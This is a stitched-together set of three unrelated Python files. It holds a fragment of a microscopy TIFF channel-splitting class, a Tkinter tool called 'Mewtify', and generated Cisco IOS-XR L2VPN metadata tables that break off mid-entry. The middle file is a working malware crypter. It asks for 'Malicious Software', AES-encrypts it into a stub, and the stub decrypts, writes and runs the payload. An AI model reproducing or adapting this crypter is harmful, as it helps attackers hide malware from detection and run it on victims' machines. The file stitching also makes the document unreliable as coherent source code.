num_405 = (md.channel_ind == self.channel_inds[self.laser_405]).sum()
num_488 = (md.channel_ind == self.channel_inds[self.laser_488]).sum()
if num_405 == num_488:
self.has_valid_channel_inds = True
else:
self.event_logger(
'Channels have unequal number of slices: %s and %s' % (num_405, num_488)
)
# in each channel, check that slice_ind increments by 1.0
# and that exposure time and laser power are consistent
for channel_ind in unique_channel_inds:
md_channel = md.loc[md.channel_ind == channel_ind]
steps = np.unique(np.diff(md_channel.slice_ind))
# check that slice inds are contiguous
if len(steps) == 1 and steps[0] == 1:
self.has_valid_slice_inds = True
elif len(steps) == 1:
self.event_logger(
'Unexpected slice_ind increment %s for channel_ind %s'
% (steps[0], channel_ind)
)
elif len(steps) > 1:
self.event_logger(
'The slice_inds are not contiguous for channel_ind %s' % channel_ind
)
for column in float_columns:
steps = np.unique(np.diff(md_channel[column]))
                # guard against channels with a single page, for which np.diff
                # returns an empty array and steps[0] would raise an IndexError
                if len(steps) > 1 or (len(steps) == 1 and steps[0] != 0):
self.event_logger(
'Inconsistent values found in column %s for channel_ind %s'
% (column, channel_ind)
)
self.validated_mm_metadata = md
@staticmethod
def tag_and_coerce_metadata(row, tag):
'''
Transform `row` to a dict, prepend the keys with `tag`,
and do some hackish type coercion
'''
d = {}
for key, val in dict(row).items():
key = '%s_%s' % (key, tag)
try:
val = float(val)
except Exception:
pass
d[key] = val
return d
def split_channels(self):
'''
Split the pages of the pipeline-like TIFF into 405 and 488 channels
to construct the z-stack for each channel and, if possible,
extract the channel-specific MM metadata (i.e., exposure time and laser power)
Overview
--------
        In a perfect world, this would be easy: we would simply use the two unique channel_inds
to split the pages by channel (and verify the page order using the slice_inds).
Unfortunately, due to a bug, the MM metadata tag in some TIFFs is the same on every page
(this is notably true for 'disentangled' TIFFs from Plates 16,17,18).
In these cases, we split the tiff into channels simply by splitting the pages in half.
        Note that we use the flags set in self.validate_micromanager_metadata to determine
which of these methods to use.
Assignment of channels
----------------------
When there are two valid channel_inds, the 405 laser is assigned
to the lower channel_ind (which is either 0 or -1).
When there are no channel_inds, the 405 laser is assigned
to the first half of the pages.
'''
self.did_split_channels = True
self.stacks = {}
md = self.validated_mm_metadata.copy()
if self.has_valid_channel_inds:
for channel_name in (self.laser_405, self.laser_488):
channel_md = md.loc[md.channel_ind == self.channel_inds[channel_name]]
self.global_metadata.update(
self.tag_and_coerce_metadata(channel_md.iloc[0], tag=channel_name)
)
self.stacks[channel_name] = self.concat_pages(channel_md.page_ind.values)
elif self.safe_to_split_in_half:
n = int(md.shape[0]/2)
self.stacks[self.laser_405] = self.concat_pages(md.iloc[:n].page_ind.values)
self.stacks[self.laser_488] = self.concat_pages(md.iloc[n:].page_ind.values)
else:
self.event_logger('Unable to safely split pages by channel')
self.did_split_channels = False
def concat_pages(self, page_inds):
        '''
        Stack the TIFF pages at the given page_inds into a (z, y, x) numpy array
        '''
stack = np.array([self.tiff.pages[ind].asarray() for ind in page_inds])
return stack
def project_stack(self, channel_name, axis, dst_filepath=None):
'''
Generate x-, y-, or z-projections and log the max and min intensities
'''
axis_inds = {'x': 1, 'y': 2, 'z': 0}
if axis not in axis_inds.keys():
raise ValueError("Axis must be one of 'x', 'y', or 'z'")
axis_ind = axis_inds[axis]
try:
proj = self.stacks[channel_name].max(axis=axis_ind)
minmax = {
'min_intensity': int(proj.min()),
'max_intensity': int(proj.max()),
}
self.global_metadata.update(self.tag_and_coerce_metadata(minmax, tag=channel_name))
if dst_filepath is not None:
tifffile.imsave(dst_filepath, proj)
except Exception:
self.event_logger(
                'An error occurred while %s-projecting the %s channel' % (axis, channel_name)
)
def calculate_z_profiles(self, channel):
'''
Calculate various statistics of the intensities for each z-slice
'''
stack = self.stacks[channel]
return {
'min': np.array([zslice.min() for zslice in stack]).astype(int),
'max': np.array([zslice.max() for zslice in stack]).astype(int),
'mean': np.array([zslice.mean() for zslice in stack]).astype(int),
'p9999': np.array([np.percentile(zslice, 99.99) for zslice in stack]).astype(int),
}
@staticmethod
def find_cell_layer(stack):
'''
Estimate the center of the cell layer using the center of mass
of the z-profile of the mean intensity of the Hoechst staining
'''
# z-profile of the mean intensity in the Hoechst channel
raw_profile = np.array([zslice.mean() for zslice in stack]).astype(float)
profile = raw_profile - raw_profile.mean()
profile[profile < 0] = 0
x = np.arange(len(profile))
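        # weighted mean of the slice index: sum_i(i * profile_i) / sum_i(profile_i)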
center_of_mass = (profile * x).sum()/profile.sum()
return center_of_mass, raw_profile
def align_cell_layer(
self, cell_layer_bottom, cell_layer_top, step_size, bottom_wiggle_room=0
):
'''
Approximately align the 405 and 488 stacks to correct for chromatic aberration,
and crop around the cell layer so that it is in the center of the stack
cell_layer_bottom : the position of the bottom of the cell layer, in microns,
relative to the center of the cell layer (should be negative)
cell_layer_top : the position of the top of cell layer, in microns,
relative to the center (should be positive)
step_size : the z-step size of the stack (in microns)
(note that the step size is not included in the MicroManager metadata,
so it must be provided by the user)
bottom_wiggle_room : optional 'wiggle room', in microns, for the cell_layer_bottom;
if the actual bottom of the stack is within this distance of cell_layer_bottom,
the stack is still cropped, and the bottom of the cropped stack padded with zeros.
For example, if cell_layer_bottom is -5um but the actual bottom is at -4.5um,
setting bottom_wiggle_room to 1um would allow the stack to be cropped
(because -4.5 + 5 < 1)
'''
stacks = {}
result = {}
stack_405 = self.stacks[self.laser_405].copy()
stack_488 = self.stacks[self.laser_488].copy()
# hard-coded chromatic aberration offset in microns
# this is an empirically estimated median offset,
# obtained by inspecting z-stacks from nucleus-localized targets
chromatic_aberration_offset = 1.0
offset_ind = int(chromatic_aberration_offset/step_size)
stack_405 = stack_405[:-offset_ind, :, :]
stack_488 = stack_488[offset_ind:, :, :]
        # estimate the cell layer center and round it to the nearest z-slice
cell_layer_center, _ = self.find_cell_layer(stack_405)
cell_layer_center = np.round(cell_layer_center)
# absolute position, in number of z-slices, of the top and bottom of the cell layer
bottom_ind = int(np.floor(cell_layer_center + cell_layer_bottom/step_size))
top_ind = int(np.ceil(cell_layer_center + cell_layer_top/step_size))
# log some parameters (for debugging, mostly)
result['padded'] = False
result['stack_shape'] = stack_405.shape
result['crop_window'] = [bottom_ind, top_ind]
result['cell_layer_center'] = cell_layer_center
result['chromatic_aberration_offset'] = offset_ind
pad_depth = None
if bottom_ind < 0:
if abs(bottom_ind) <= np.round(bottom_wiggle_room/step_size):
pad_depth = abs(bottom_ind)
bottom_ind = 0
else:
result['error'] = 'The cell layer center was too close to the bottom of the stack'
return stacks, result
if top_ind >= stack_405.shape[0]:
result['error'] = 'The cell layer center was too close to the top of the stack'
return stacks, result
stack_405 = stack_405[bottom_ind:top_ind, :, :]
stack_488 = stack_488[bottom_ind:top_ind, :, :]
# pad the bottom of the stack if necessary
if pad_depth:
result['padded'] = True
result['pad_depth'] = pad_depth
padding = np.zeros((pad_depth, *stack_405.shape[1:]), dtype=stack_405.dtype)
stack_405 = np.concatenate((padding, stack_405), axis=0)
stack_488 = np.concatenate((padding, stack_488), axis=0)
stacks = {'405': stack_405, '488': stack_488}
return stacks, result
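# A minimal usage sketch (illustrative only; 'stack.tif' and the output
# filenames are hypothetical, not part of the class API above):
#
#     tiff = RawPipelineTIFF('stack.tif')
#     tiff.parse_micromanager_metadata()
#     tiff.validate_micromanager_metadata()
#     tiff.split_channels()
#     if tiff.did_split_channels:
#         tiff.project_stack('405', axis='z', dst_filepath='405_zproj.tif')
#     tiff.save_events('events.csv')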
|
#!/usr/bin/env python3
import tkinter as tk
import binascii, pyaes, sys, base64, os.path, os
from tkinter import *
from pathlib import Path
from tkinter.font import Font
from tkinter.filedialog import askopenfilename
import secrets
import string
def main():
global entry3
input2 = entry3.get()
# Open file
file_name = malwarename # Malware path
new_file_name = input2 # Path to drop file
file = open(file_name, "rb")
file_data = file.read()
file.close()
# Crypt file data (Using AES)
key = bytearray(ran_string, 'UTF-8') # 16 bytes key - change for your key
aes = pyaes.AESModeOfOperationCTR(key)
crypto_data = aes.encrypt(file_data)
# Create Stub in Python File
stub = "import pyaes\n"
stub += "import sys\n"
stub += "crypto_data_hex = " + str(crypto_data) + "\n"
stub += "key = " + str(key) + "\n"
stub += "new_file_name = \"" + str(new_file_name) + "\"\n"
stub += "aes = pyaes.AESModeOfOperationCTR(key)\n"
stub += "crypto_data = crypto_data_hex\n"
stub += "decrypt_data = aes.decrypt(crypto_data)\n"
# Save file
stub += "new_file = open(new_file_name, 'wb')\n"
stub += "new_file.write(decrypt_data)\n"
stub += "new_file.close()\n"
# Execute file
stub += "import subprocess\n"
stub += 'proc = subprocess.Popen("python "+new_file_name, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n'
# Save the Stub
stub_name = str(input2)
stub_file = open(stub_name, "w")
stub_file.write(stub)
stub_file.close()
return
def fname():
global malwarename
malwarename = askopenfilename()
return malwarename
N=16
ran_string = ''.join(secrets.choice(string.ascii_uppercase + string.digits)
for i in range(N))
# GUI Dimensions
HEIGHT = 500
WIDTH = 700
root = tk.Tk()
# GUI NAME AND SIZE
root.title("MEWTIFY")
canvas = tk.Canvas(root, height=HEIGHT, width=WIDTH)
canvas.pack()
background_image = tk.PhotoImage(file='yaj.png')
background_label = tk.Label(root, image=background_image)
background_label.image= background_image
background_label.place(relwidth=1,relheight=1)
root.resizable(False, False)
# GUI HEADER
frame = tk.Frame(root, bg='#80C1FF', bd=5)
frame.place(relx=0.5, rely=0.05, relwidth=1, relheight=0.2, anchor='n')
label = tk.Label(frame, text="Welcome to Mewtify!", font=("-weight bold", 27), bg='#80C1FF')
label.place(relx=0.3, rely=0, relwidth=.5, relheight=1)
# INPUT 1
label2 = tk.Label(root, text="Malicious Software with full path:", anchor='w', font=15)
label2.place(relx=0, rely=0.35, relwidth=0.4, relheight=0.10)
filebutton = tk.Button(root, text="Select", font=40, command=fname)
filebutton.place(relx=.5, rely=0.35, relwidth=0.45, relheight=0.09)
# INPUT2
label3 = tk.Label(root, text="Name of Mutated Software:", anchor='w', font=15)
label3.place(relx=0, rely=0.5, relwidth=0.4, relheight=0.10)
entry3 = tk.Entry(root, font=40)
entry3.place(relx=.5, rely=0.5, relwidth=0.45, relheight=0.09)
entry3.focus_set()
# button mashing
button = tk.Button(root, text="MEWTIFY", bg="purple", font=40, command=main)
button.place(relx=0.3, rely=0.8, relwidth=0.45, relheight=0.15)
button1=tk.Button(root, text="click to exit", bg= "red", font =10,command=root.destroy)
button1.place(relx=.8, rely=0.9, relwidth=0.15, relheight=0.05)
root.mainloop()
|
import re
import collections
from enum import Enum
from ydk._core._dm_meta_info import _MetaInfoClassMember, _MetaInfoClass, _MetaInfoEnum
from ydk.types import Empty, YList, YLeafList, DELETE, Decimal64, FixedBitsDict
from ydk._core._dm_meta_info import ATTRIBUTE, REFERENCE_CLASS, REFERENCE_LIST, REFERENCE_LEAFLIST, REFERENCE_IDENTITY_CLASS, REFERENCE_ENUM_CLASS, REFERENCE_BITS, REFERENCE_UNION
from ydk.errors import YPYError, YPYModelError
from ydk.providers._importer import _yang_ns
_meta_table = {
'FlowLabelTlvCodeEnum' : _MetaInfoEnum('FlowLabelTlvCodeEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'17':'Y_17',
'disable':'disable',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'BackupDisableEnum' : _MetaInfoEnum('BackupDisableEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'never':'never',
'delay':'delay',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'BgpRouteTargetFormatEnum' : _MetaInfoEnum('BgpRouteTargetFormatEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'none':'none',
'two-byte-as':'two_byte_as',
'four-byte-as':'four_byte_as',
'ipv4-address':'ipv4_address',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'LoadBalanceEnum' : _MetaInfoEnum('LoadBalanceEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'source-dest-mac':'source_dest_mac',
'source-dest-ip':'source_dest_ip',
'pseudowire-label':'pseudowire_label',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'InterworkingEnum' : _MetaInfoEnum('InterworkingEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'ethernet':'ethernet',
'ipv4':'ipv4',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'PwSwitchingPointTlvEnum' : _MetaInfoEnum('PwSwitchingPointTlvEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'hide':'hide',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'MacAgingEnum' : _MetaInfoEnum('MacAgingEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'absolute':'absolute',
'inactivity':'inactivity',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'L2Tpv3SequencingEnum' : _MetaInfoEnum('L2Tpv3SequencingEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'off':'off',
'both':'both',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'ErpPort1Enum' : _MetaInfoEnum('ErpPort1Enum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'port0':'port0',
'port1':'port1',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'InterfaceProfileEnum' : _MetaInfoEnum('InterfaceProfileEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'snoop':'snoop',
'dhcp-protocol':'dhcp_protocol',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'L2EncapsulationEnum' : _MetaInfoEnum('L2EncapsulationEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'vlan':'vlan',
'ethernet':'ethernet',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'InterfaceTrafficFloodEnum' : _MetaInfoEnum('InterfaceTrafficFloodEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'traffic-flooding':'traffic_flooding',
'enable-flooding':'enable_flooding',
'disable-flooding':'disable_flooding',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'L2VpnLoggingEnum' : _MetaInfoEnum('L2VpnLoggingEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'enable':'enable',
'disable':'disable',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'BgpRouteTargetRoleEnum' : _MetaInfoEnum('BgpRouteTargetRoleEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'both':'both',
'import':'import_',
'export':'export',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'ErpPortEnum' : _MetaInfoEnum('ErpPortEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'none':'none',
'virtual':'virtual',
'interface':'interface',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'MacWithdrawBehaviorEnum' : _MetaInfoEnum('MacWithdrawBehaviorEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'legacy':'legacy',
'optimized':'optimized',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'L2TpCookieSizeEnum' : _MetaInfoEnum('L2TpCookieSizeEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'zero':'zero',
'four':'four',
'eight':'eight',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'StormControlEnum' : _MetaInfoEnum('StormControlEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'unicast':'unicast',
'multicast':'multicast',
'broadcast':'broadcast',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'L2TpSignalingProtocolEnum' : _MetaInfoEnum('L2TpSignalingProtocolEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'none':'none',
'l2tpv3':'l2tpv3',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'RplRoleEnum' : _MetaInfoEnum('RplRoleEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'owner':'owner',
'neighbor':'neighbor',
'next-neighbor':'next_neighbor',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'MacLimitActionEnum' : _MetaInfoEnum('MacLimitActionEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'none':'none',
'flood':'flood',
'no-flood':'no_flood',
'shutdown':'shutdown',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'TypeOfServiceModeEnum' : _MetaInfoEnum('TypeOfServiceModeEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'none':'none',
'reflect':'reflect',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'MacNotificationEnum' : _MetaInfoEnum('MacNotificationEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'no-notif':'no_notif',
'syslog':'syslog',
'trap':'trap',
'syslog-snmp':'syslog_snmp',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'L2VpnVerificationEnum' : _MetaInfoEnum('L2VpnVerificationEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'enable':'enable',
'disable':'disable',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'LdpVplsIdEnum' : _MetaInfoEnum('LdpVplsIdEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'two-byte-as':'two_byte_as',
'ipv4-address':'ipv4_address',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'MacLearnEnum' : _MetaInfoEnum('MacLearnEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'default-learning':'default_learning',
'enable-learning':'enable_learning',
'disable-learning':'disable_learning',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'PortDownFlushEnum' : _MetaInfoEnum('PortDownFlushEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'port-down-flush':'port_down_flush',
'enable-port-down-flush':'enable_port_down_flush',
'disable-port-down-flush':'disable_port_down_flush',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'L2VpnCapabilityModeEnum' : _MetaInfoEnum('L2VpnCapabilityModeEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'high-mode':'high_mode',
'single-mode':'single_mode',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'MplsSignalingProtocolEnum' : _MetaInfoEnum('MplsSignalingProtocolEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'none':'none',
'ldp':'ldp',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'BgpRouteTargetEnum' : _MetaInfoEnum('BgpRouteTargetEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'no-stitching':'no_stitching',
'stitching':'stitching',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'ControlWordEnum' : _MetaInfoEnum('ControlWordEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'enable':'enable',
'disable':'disable',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'PreferredPathEnum' : _MetaInfoEnum('PreferredPathEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'te-tunnel':'te_tunnel',
'ip-tunnel':'ip_tunnel',
'tp-tunnel':'tp_tunnel',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'BridgeDomainTransportModeEnum' : _MetaInfoEnum('BridgeDomainTransportModeEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'vlan-passthrough':'vlan_passthrough',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'FlowLabelLoadBalanceEnum' : _MetaInfoEnum('FlowLabelLoadBalanceEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'off':'off',
'receive':'receive',
'transmit':'transmit',
'both':'both',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'BgpRouteDistinguisherEnum' : _MetaInfoEnum('BgpRouteDistinguisherEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'auto':'auto',
'two-byte-as':'two_byte_as',
'four-byte-as':'four_byte_as',
'ipv4-address':'ipv4_address',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'ErpapsEnum' : _MetaInfoEnum('ErpapsEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'interface':'interface',
'bridge-domain':'bridge_domain',
'xconnect':'xconnect',
'none':'none',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'VccvVerificationEnum' : _MetaInfoEnum('VccvVerificationEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'none':'none',
'lsp-ping':'lsp_ping',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'TransportModeEnum' : _MetaInfoEnum('TransportModeEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'ethernet':'ethernet',
'vlan':'vlan',
'vlan-passthrough':'vlan_passthrough',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'MplsSequencingEnum' : _MetaInfoEnum('MplsSequencingEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'off':'off',
'transmit':'transmit',
'receive':'receive',
'both':'both',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'MacSecureActionEnum' : _MetaInfoEnum('MacSecureActionEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'restrict':'restrict',
'none':'none',
'shutdown':'shutdown',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
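    # Illustrative (not generated) lookup: each key below is a YANG class path,
    # e.g. _meta_table['L2Vpn.PwRouting']['meta_info'] returns its _MetaInfoClass.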
'L2Vpn.PwRouting.PwRoutingBgp.EvpnRouteDistinguisher' : {
'meta_info' : _MetaInfoClass('L2Vpn.PwRouting.PwRoutingBgp.EvpnRouteDistinguisher',
False,
[
_MetaInfoClassMember('addr-index', ATTRIBUTE, 'int' , None, None,
[('0', '65535')], [],
''' Addr index
''',
'addr_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' IPV4 address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Two byte or 4 byte AS number
''',
'as_',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as-index', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' AS:nn (hex or decimal format)
''',
'as_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type', REFERENCE_ENUM_CLASS, 'BgpRouteDistinguisherEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteDistinguisherEnum',
[], [],
                    ''' Route Distinguisher Type
''',
'type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-route-distinguisher',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.PwRouting.PwRoutingBgp' : {
'meta_info' : _MetaInfoClass('L2Vpn.PwRouting.PwRoutingBgp',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Autodiscovery BGP
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-route-distinguisher', REFERENCE_CLASS, 'EvpnRouteDistinguisher' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.PwRouting.PwRoutingBgp.EvpnRouteDistinguisher',
[], [],
''' Route Distinguisher
''',
'evpn_route_distinguisher',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pw-routing-bgp',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.PwRouting' : {
'meta_info' : _MetaInfoClass('L2Vpn.PwRouting',
False,
[
_MetaInfoClassMember('pw-routing-bgp', REFERENCE_CLASS, 'PwRoutingBgp' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.PwRouting.PwRoutingBgp',
[], [],
''' Enable Autodiscovery BGP Pseudowire-routing BGP
''',
'pw_routing_bgp',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pw-routing-global-id', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Pseudowire-routing Global ID
''',
'pw_routing_global_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pw-routing',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Neighbor' : {
'meta_info' : _MetaInfoClass('L2Vpn.Neighbor',
False,
[
_MetaInfoClassMember('ldp-flap', ATTRIBUTE, 'Empty' , None, None,
[], [],
                    ''' Enable targeted LDP session flap action
''',
'ldp_flap',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'neighbor',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort0S.ErpPort0' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpPort0S.ErpPort0',
False,
[
_MetaInfoClassMember('interface-name', ATTRIBUTE, 'str' , None, None,
